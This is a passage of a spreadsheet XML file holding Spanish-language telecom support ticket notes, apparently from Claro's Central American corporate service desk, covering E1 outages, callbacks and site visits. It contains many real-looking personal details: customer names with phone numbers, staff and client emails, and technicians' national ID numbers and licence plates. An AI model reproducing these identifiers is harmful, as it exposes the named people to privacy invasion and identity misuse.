    <t>EN LINEA CON CLIENTE JUANA CHANCHAVAC 54145187, CLIENTE INDICA QUE NO GENERA NI RECIBE LLAMADA, SE LE SOLICITA SU APOYO PARA UBICAR SU PLANTA PBX, DEJA EN ESPERA EN LO QUE LO UBICA</t>
  </si>
  <si>
    <t>CLIENTE REINICIA EQUIPOS PERO NO SE LOGRA VER QUE CAIGA EL E1, LUEGO DE VERIFICAR LOS DATOS CON JUANA CHANCHAVAC 54145187 , INDICA QUE EL E1 AFECTADO NO ES ESTE DE CHICHICASTENANGO, SINO EL SIGUIENTE, SE PROCEDE AL CIERRE DE CASO:
BANCO INDUSTRIAL- 77937100
DIRECCIÓN: ALDEA EL CARMEN CHITATUL KM 166.9 CARRETERA A JOYABAJ, DENTRO DE LA URL
ID: 90001910298T
RESULTADO: LLAMADA HECHA
NOMBRE: 54145187
NÚMERO: 54145187
INICIO: HOY, 12:01 P. M.
FIN: HOY, 12:21 P. M.
DURACIÓN: 19:30
ID DE LLAMADA: 1001193673</t>
  </si>
  <si>
    <t>F4608722</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE SARA AL 31886890 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 1001237000
**</t>
  </si>
  <si>
    <t>F4608727</t>
  </si>
  <si>
    <t>F4608734</t>
  </si>
  <si>
    <t>CLIENTE ROSARIO APOYO A REINICIAR EQUIPO ASMI52, DESPUES DE ESTO SERVICIO QUEDA OPERATIVO, CLIENTE CON LLAMADAS ENTRANTES Y SALIENTES DEL E1. SE PROCEDE AL CIERRE DEL CASO.
1001179779
COLA:
NOMBRE: A: 47234466
NÚMERO: 47234466
DURACIÓN: 0:06:58
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47234466
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 11:31:23</t>
  </si>
  <si>
    <t>F4608741</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO PARA REVISIÓN DE EQUIPOS DE UM, POSIBLE CORTE DE FO EN SECTOR; ADICIONAL SE LLAMÓ/HABLÓ CON EMANUEL HERNÁNDEZ/CLIENTE 58698822 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4608742</t>
  </si>
  <si>
    <t>NOS ATIENDE ANA GARCIA, QUIEN NOS EXPLICA EL PROBLEMA QUE ESTA PRESENTANDO, INDICA QUE AL MOMENTO DE RECIBIR MAS DE DOS LLAMADAS ENTRANTES ELLA NO PUEDE DEJAR EN ESPERA Y CONTESTAR LA OTRA YA QUE LE APARECE PERDIDA DESPUES DE UNOS MINUTOS, CLIENTE INDICA QUE VALIDANDO CON EL PERSONAL IT LE INDICARON QUE TENIA QUE VERLO CON EL PROVEEDOR DEL TELEFONO O DE LA PLANTA TELEFONICA E INDICA QUE ESO ESTARA VERIFICANDO PARA QUE PUEDAN MANTENER LA LLAMADA MAS TIEMPO EN ESPERA O PODER TRANSFERIRLA A OTRA EXT. SE LE EXPLICA AL CLIENTE QUE POR EL MOMENTO EL SERVICIO DE E1 SE ENCUENTRA OPERATIVO Y QUE DE IGUAL FORMA TENIA QUE VERLO CON EL PROVEEDOR, CLIENTE QUEDA ENTERADA Y NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTATA AL GDN INGRESA LA LLAMADA SIN PROBLEMAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4608743</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRAYAN MORALES 41222979 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001254111</t>
  </si>
  <si>
    <t>F4608756</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILSON MARROQUIN NO RESPONDE, SE INTENTARA LUEGO
-ID 1001210063</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTHA CASTILLO 25913426 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001211139</t>
  </si>
  <si>
    <t>F4608758</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTHA CASTILLO 25913426 MENCIONA QUE SI CUENTAN CON ENERGIA Y CLIENTE SOLICITA VISITA
-ID 1001211139
NOMBRE DEL CLIENTE: INSTITUTO SALVADORENO DEL SEGURO SOCIAL
UBICACIÓN: COLONIA LISBOA CALLE ANTIGUA A SAN ANTONIO ABAD NUMERO DE LOCAL 771 SAN SALVADOR
CONTACTO EN SITIO:ENCARGADO EN PR
HORARIO DE ATENCION:8:00 - 15:00
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO  --MARTHA.CASTILLO@ISSS.GOB.SV</t>
  </si>
  <si>
    <t>F4608759</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 13:09
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; SOLMER EDUARDO LOPEZ &lt;SELOPEZ@GRUPOMONTECRISTO.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;
ASUNTO: RE: ENLACE HIDROELECTRICA CUYAGUAL
*-*-*-*</t>
  </si>
  <si>
    <t>F4608761</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA  ## VICTOR GUDIEL-52298149 ## VALIDA ##VIVO</t>
  </si>
  <si>
    <t>F4608772</t>
  </si>
  <si>
    <t>SE BRINDA RETROALIEMTACION A CLIENTE MARTHA CASTILLO 25913426
-ID 1001211139</t>
  </si>
  <si>
    <t>F4608779</t>
  </si>
  <si>
    <t>JARED ESPAÑA/CLIENTE INDICA QUE YA TODO OK, PIDE YA NO SE TOQUE NADA DE LO REALIZADO; SE PIDE APOYO A GESTIÓN AE VÍA SKYPE, SE LES LLAMÓ, GESTOR AE OCUPADO; SE LE PIDE CIERRE DEL TICKET A CLIENTE, PIDE SE MANTENGA EN MONITOREO PARA MAÑANA A LAS 10:00AM.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HARED ESPAÑA 54947431  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001380726</t>
  </si>
  <si>
    <t>SE PIDE APOYO A GESTIÓN AE MOVER TICKET A ESTADO DE MONITOREO, SEGÚN CRONOS ANTERIORES.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JARED QUIEN INDICA QUE MEJORO PERO TODAVIA SE TARDA.
SE APERTURA WO A CX NUEVAMENTE.
1001282716
COLA:
NOMBRE: A: 54947431
NÚMERO: 54947431
DURACIÓN: 0:00:38
ESTADO: CONECTADA
DETALLES: 54947431
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 16:43:30</t>
  </si>
  <si>
    <t>F4608781</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON EVIDENCIA DEL ENLACE OPERATIVO:
RE: TICKET CLARO 1136678 || SR10628878</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. PABLO VASQUEZ 31348756 ACTUALMENTE EN LLAMADA ....</t>
  </si>
  <si>
    <t>F4608786</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE EVELYN ALVAREZ 76769577, SOLICITA SE LE LLAME A LAS 13:30 HORAS YA QUE NO SE ENCUENTRA EN SUS INSTALACIONES. ID: 1001209380</t>
  </si>
  <si>
    <t>CLIENTE EVELYN SALAZAR 76769577 INDICA QUE EL SERVICIO ESTÁ CAIDO NUEVAMENTE, SE LE SOLICITA SU APOYO PARA VALIDAR EQUIPOS PERO INDICA QUE PREFIERE QUE LLEGUE PERSONAL A REVISAR FÍSICAMENTE. SE ABRIRÁ WO. NOTA: SE LE INDICA AL CLIENTE QUE DEBE REVISAR SU PBX CON SU PROVEEDOR YA QUE EN VARIAS OCACIONES SE LE HA INDICADO QUE EL INCONVENIENTE VIENE DE SU PBX PERO CLIENTE NO QUIERE ACEPTAR. ID DE LLAMADA: 1001383087</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELIN  INDICA QUE SIGUE CON EL INCONVENIENTE || SE NOTIFICA A GESTOR **
-ID 1001356530
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELIN SIN EMBARGO NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001283935
**</t>
  </si>
  <si>
    <t>CLIENTE EVELYN SALAZAR  VALIDA QUE EL SERVICIO SE ENCUENTAR FUNCIONANDO CORRECTAMENTE, SE LE RECOMIENDA AL CLIENTE QUE DEBE SOLICITAR UNA REVISIÓN A SU PLANTA PBX YA QUE EN OTRAS OCASIONES SE HA DETERMINADO QUE LA PBX ES LA QUE LIBERA LAS LLAMADAS. DE PARTE DE CLARO NO SE OBSERVA INCONVENIENTES. CLIENTE ENTERADA COMENTA QUE COORDINARÁ UNA VISITA CON SU PROVEEDOR. SE PROCEDE AL CIERRE DEL CASO. ID: 1001437447</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN ALVAREZ 76769577 MENCIONA QUE PERSISTE EL INCONVENIENTE CON LAS LLAMADAS, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001238740</t>
  </si>
  <si>
    <t>F4608787</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MILTON MELENDEZ 66967736 IVR INDICA QUE SE ENCUENTRA PENDIENTE DE INSTALACION
-ID 1001218969</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ESPINOSA  71654296 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001218302</t>
  </si>
  <si>
    <t>F4608793</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER ALFARO 61809669 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001267976</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER ALFARO 61809669 MENCIONA QUE PERSISTE EL INCONVENIENTE EN PODER SACAR Y RECIBIR LLAMADAS
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001263690</t>
  </si>
  <si>
    <t>F4608794</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE CRISTIAN VALLEJO, Y SE LE SOLICITO UN RESET AL AETHRA.
CLIENTE APAGA EL EQUIPO.
1001244619
COLA:
NOMBRE: A: 47400983
NÚMERO: 47400983
DURACIÓN: 0:00:56
ESTADO: CONECTADA
DETALLES: 47400983
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 14:41:44</t>
  </si>
  <si>
    <t>F4608807</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTEFANIE ESCOBAR 79878191  NO RESPONDE, ENVIA A BUZON
-ID 1001262812</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTEFANIE ESCOBAR 79878191 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001279452
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 79878191  - 77412258 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001212250 - 1001212689
**</t>
  </si>
  <si>
    <t>F4608811</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JOSE ALVARENGA 77012297, SOLICITA SE LE LLAME EN 10 MINUTOS, EN LO QUE SE DESPLAZA A DONDE ESTÁN SUS EQUIPOS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE APOYA UBICANDO EQUIPO ASMI, EL EQUIPO SE ENCUENTRA SINCRONIZADO PERO AUN NO GENERA NI RECIBE LLAMADAS, SE ABRIRÁ WO PARA CERTIFICAR EL E1. ID DE LLAMADA: 1001231157</t>
  </si>
  <si>
    <t>F4608812</t>
  </si>
  <si>
    <t>**KRYSTOPHER LETONA (ANALISTA I DE MONITOREO) 1755 EXT 10557 INDICA QUE EN UN MOMENTO ETARAN RESPONDIENDO EL CORREO **
-ID 1001215234
**</t>
  </si>
  <si>
    <t>F4608820</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FREDY URIAS QUIEN NO RESPONDE. SE NECESITA CONFIRMAR  SI PERSONAL DE IE NETWORKS  YA LO CONTACTO.
1001237308
COLA:
NOMBRE: A: 57625335
NÚMERO: 55280199
DURACIÓN: 0:00:30
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 14:17:45
1001237462
COLA:
NOMBRE: A: 57625335
NÚMERO: 57625335
DURACIÓN: 0:00:18
ESTADO: MARCANDO
DETALLES: 57625335
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 14:18:03</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY URIAS 57625335  MENCIONA QUE YA SE ENCUENTRA CON PERSONAL DE IE NETWORKS EN PR PARA INICIAR CON LA VISITA
-ID 1001390039</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FREDY PARA CONSULTAR SI EL PERSONAL DE IENETWORKS TENDRA ACCESO HOY AL SITIO PERO CORTA LA LLAMADA. SE SOLICITARÁ APOYO PARA LOCALIZAR AL CLIENTE Y CONSULTARLE
1001388364
COLA:
NOMBRE: A: 57625335
NÚMERO: 55280199
DURACIÓN: 0:00:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 21/06/2022 10:49:27</t>
  </si>
  <si>
    <t>SE LLAMA  ACLIENTE FREDY URIAS 57625335 MENCIONA QUE YA ESTA CON PERSONAL TECNICO DIRIGIENDOLOS A DONDE ESTAN LOS EQUIPOS
-ID 1001834518</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE FREDY URIAS 57625335 MENCIONA QUE SI RECIBIO EL CORREO PERO POR LA HORA  LOS PERMISOS LOS TRAMITARA MAÑANA PARA QUE INGRESEN EL DIA JUEVES, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001486967 - 1001488392</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA TRAMITAR PERMISOS DE INGRESO AL SITIO. TODOS LOS HOSTED ESTAN AFECTADOS EN EL AEROPUERTO. SE QUEDA A LA ESPERA DE LOS PERMISOS DE INGRESO.
DATOS PERSONAL TÉCNICO CLARO ----REVISIÓN LINEAS HOSTED
ESVIN ANTONIO PAREDES SAMUY
BUENAS TARDES ESTIMADO CLIENTE POR ESTE MEDIO ENVIÓ INFORMACIÓN DEL PERSONAL TÉCNICO QUE PODRÁ ATENDER EL CASO:
NOMBRE	MODELO	PLACA	DPI
PEDRO EDUARDO TOT MARTINEZ 	NISSAN SEDAN	P-055GLD	1681-34810-0101
JUAN JOSE RODRIGUEZ PAZ  	NISSAN MARCH	P-740GTV	2494-43260-0208
MARLON ENRIQUE MUÑOZ ORELLANA  	NISSAN MARCH
P-173JFM
1582-46500-1801
ERWIN EDUARDO DEL CID	NISSAN MARCH
P-049JNR	1981-48798-0101
ADJUNTO TAMBIÉN LAS IMÁGENES DE LOS DPI.
LAS HERRAMIENTAS A INGRESAR SON:
ALICATES
PINZAS
ESCALERA
LAPTOP
OTDR MARCA VEEX
QUEDAMOS A LA ESPERA DE LA CONFIRMACIÓN DE LOS ACCESOS PARA PODER HACER REVISIÓN DE LOS EQUIPOS.
SALUDOS</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FREDY PERO NO RESPONDE. SE NECESITA CONFIRMAR CON EL CLIENTE SI RECIBIO EL CORREO PARA TRAMITAR LOS PERMISOS DE INGRESO.
1001481314
COLA:
NOMBRE: A: 57625335
NÚMERO: 55280199
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 21/06/2022 15:22:14
1001481314
COLA:
NOMBRE: A: 57625335
NÚMERO: 55280199
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 21/06/2022 15:22:29</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY URIAS 57625335 MENCIONA QUE LA OFICINA DONDE SE GESTIONAN LOS PERMISOS ESTA CERRADA POR LO QUE SOLICITA LLAMADA PARA LAS  15:00 VALIDAR SI YA SE TIENEN LOS PERMISOS
-ID 1001650620 - 1001650781</t>
  </si>
  <si>
    <t>F4608825</t>
  </si>
  <si>
    <t>*/*/*/*/SE TIENE PROGRAMADA VISITA A LAS 10AM, CLIENTE YA CONFIRMÓ QUE SE TIENEN LOS PERMISOS, POR FAVOR PROCEDER*/*/*SE NOTIFICA A GESTOR POR SKYPE Y SE CAMBIA DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>-* SEGUIMIENTO CON SD1136691 // F4608820, SE VALIDA QUE ESTAN EN PROCESO DE COORDINACION PARA VISITA TECNICA, A LA ESPERA DE QUE SE COMPLETE LA DOCUMENTACION NECESARIA PARA EL INGRESO DE LOS TECNICOS -*
*-</t>
  </si>
  <si>
    <t>SE  LLAMA AL CLIENTE FREDY  57625335 VALIDA EL SERVICIO Y SE PROCEDE AL CIERRE DEL CASO.
1001882531
COLA:
NOMBRE: A: 57625335
NÚMERO: 57625335
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 57625335
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 23/06/2022 12:54:06</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY URIAS AL 57625335  CLIENTE INDICA QUE ESTA EN HORA DE ALMUERZO SOLICITA QUE SE LE LLAME A LAS 14:10 PM NUEVAMENTE **
-ID 1001220215
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY URIAS 57625335 MENCIONA QUE LO CONTACTO DANIEL PONCE POR PARTE DE IE NETWORKS  Y LE INDICARON QUE ESTARIAN ENVIANDO VISITA TECNICA
CLIENTE INDICA QUE ESTARA GESTIONANDO LOS PERMISOS PARA MAÑANA Y SI NO LOGRA GESTIONARLOS LA VISITA SERÁ PARA EL MIERCOLES
-ID 1001247275</t>
  </si>
  <si>
    <t>F4608826</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA VARGAR AL 22396660 NO RESPONDE ||  SE INTENTARA LUEGO **
-ID 1001221981 - 1001222368
**</t>
  </si>
  <si>
    <t>F4608827</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JARET YOL AL 42161050 CLIENTE INDICA QUE SIGUE TENIENDO PROBLEMA DE LENTITUD || SE NOTIFICA A GESTOR **
-ID 1001222717
**</t>
  </si>
  <si>
    <t>###SE VALIDA CON CLIENTE JARET YOL EL CIERRE DEL TICKET EN CONJUNTO CON LLAMADA CON TECNICO##
1001335595
COLA:
NOMBRE: A: 58607603
NÚMERO: 58607603
DURACIÓN: 0:11:54
ESTADO: CONECTADA
DETALLES: 58607603
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 21/06/2022 08:31:47</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JARET YOL AL 42161050 - 23399050 SE INTENTA LLAMAR A CL NUEVAMENTE NO RESPONDE **
ID 1001224703 - 1001225024
**</t>
  </si>
  <si>
    <t>F4608828</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MOLINA 42418536 MENCIONA QUE  YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001200761</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIS DE LEON 47124247 PERO NO SE TIENE RESPUESTA
-ID 1001192082</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MOLINA 42418536 NO RESPONDE, SE INTENTARA LUEGO
-ID 100191386</t>
  </si>
  <si>
    <t>F4608832</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON PEDRO JUÁREZ/CLIENTE 58425537 Y SE LE BRINDAN AVANCES DE LA FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, AVANCES EN DOS HORAS.</t>
  </si>
  <si>
    <t>F4608833</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JULIO FLORES AL 22396670 NO RESPONDE || ENVIA A BUZON  SE INTENTARA LUEGO **
-ID 1001225912
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON EVIDENCIA DEL REGISTRO DE SATURACION, SE PROCEDE CIERRE DEL INCIDENTE.
ASUNTO: EVIDENCIA DE SATURACIÓN SD1136700 || IP2124278 || OMNILIFE EL SALVADOR, S.A. DE C.V.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO FLORES 22396670 SE LE BRINDA DIAGNOSTICO Y CLIENTE SOLICITA SE PUEDA ENVIAR POR CORREO LAS PRUEBAS PARA QUE VALIDEN A NIVEL INTERNO
SANTAANA@OMNILIFE.COM
-ID 1001260829</t>
  </si>
  <si>
    <t>F4608837</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE LIZETH CRUZ 77418394 DESPUES DE 3 INTENTOS CLIENTE NO NOS CONTESTA PARA REALIZAR PRUEBAS CON LOS EQUIPOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESTA DESPUES DE VARIOS INTENTOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE LIZETH CRUZ 77418394 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE LIZETH CRUZ 77418394 QUIEN INDICA QUE NO HAN REALIZADO PRUEBAS YA QUE NO HAY EQUIPOS FISICOS CERCA DEL CONMUTADOR, SOLICITA QUE SE ENVIE PERSONAL TECNICO PARA REVISAR LOS EQUIPOS EN CONJUNTO CON PERSONAL DE ELLOS, CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS UNICAMENTE QUE LLEGUEN IDENTIFICADOS CON EL CARNET DE CLARO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE LIZETH CRUZ 77418394  PARA REALIZAR PRUEBAS PERO NO SE TIENE RESPUESTA DESPUES DE DOS INTENTOS NOS MANDA A BUZON
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
F4608837 / 25234600/CARVAJAL EMPAQUES S.A. DE C.V./NO GENERA NI RECIBE LLAMADA/LS
MONICA YIREH CASTILLO POON
BUENOS DÍAS SRITA CRUZ,
REFERENTE AL SEGUIMIENTO DEL SERVICIO DE TELEFONÍA GDN 25234600 LE COMENTAMOS QUE ACTUALMENTE OBSERVAMOS UNA ALARMA DE DESCONEXIÓN EN LA ULTIMA MILLA, POR LO QUE ES NECESARIO REALIZAR PRUEBAS CON LOS EQUIPOS.
POR LO QUE SOLICITAMOS DE SU AMABLE APOYO CON VALIDAR EL ESTADO DE LAS ALARMAS DEL EQUIPO ASMI 52 O ASMI 54 Y PODER REINICIARLO, EN DADO CASO DESPUÉS DE REALIZAR LAS PRUEBAS NO RESTABLECE, CONFIRMARNOS EL HORARIO DE ATENCIÓN PARA PROCEDER A COORDINAR PERSONAL TÉCNICO A LAS INSTALACIONES.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS,</t>
  </si>
  <si>
    <t>CLIENTE LIZETH ESTABA CONFUNDIDA E INDICABA QUE  DEL 25234600 CLARO TENIA UN DESVIO HACIA 25234600 PERO A NIVEL DE CLARO NO EXISTE TAL DESVIOI, POSIBLEMENTE LA PBX DEL 25234600 HAGA DESVIO PROGRAMADO INTERNO HACIA ESTE E1, PERO EL 25234600 ESTA CAIDO, CLIENTE INDICA QUE NO TIENE PERSONAL YA EN SITIO Y QUE SE LE CONTACTE MAÑANA  21/06  A LAS 7:30 PARA QUE NOS PUEDA  HACER CONFERENCIA CON EL PUNTO REMOTO.
1001286273
COLA:
NOMBRE: A: 0050322487800
NÚMERO: 0050322487800
DURACIÓN: 0:03:27
ESTADO: CONECTADA
DETALLES: 0050322487800
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 16:59:02</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LIZETH CRUZ AL 77418394 SOLICITA QUE SE LE LLAME AL 22487800 SE LLAMA Y SE DEJA EN CONFERENCIA CON GESTOR **
-ID 1001285091  - 1001286273
**</t>
  </si>
  <si>
    <t>F4608838</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO; ADICIONAL SE LLAMÓ A CLIENTE 46266678 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TECNICO WILDER RICO SE REALIZA CONFERENCIA CON CLIENTE PARA UBICAR EQUIPOS
1001255861
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:00:37
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 20/06/2022 15:16:10</t>
  </si>
  <si>
    <t>F4608847</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE SKARLET MANZANEROS AL 41753805 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001228159
**</t>
  </si>
  <si>
    <t>F4608852</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEYDI OSOY 23191111 RESPONDE FABIOLA INDICA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001198377</t>
  </si>
  <si>
    <t>F4608855</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 15:26
PARA: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; NOCSE@MP.GOB.GT &lt;NOCSE@MP.GOB.GT&gt;
CC: FRANCISCO DAVID LOPEZ GIL &lt;FRANCISCOD.LOPEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: CASO MINISTERIO PUBLICO AGENCIA ZONA 2 SANTA ELENA PETEN FLORES || 917800004T
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SKARLET MANZANEROS 41753805 PERO NO RESPONDE
-ID 1001258332 - 1001258538</t>
  </si>
  <si>
    <t>F4608860</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON EL RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 12:05
PARA: CPERAZA@GASTOMZA.COM.SV &lt;CPERAZA@GASTOMZA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: TOMZA GAS DE EL SALVADOR, S.A. || F4608860 || 22066000
BUEN DÍA
 EN SEGUIMIENTO AL TICKET SD1136712 SE REALIZA LA ENTREGA DE DICTAMEN TÉCNICO.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
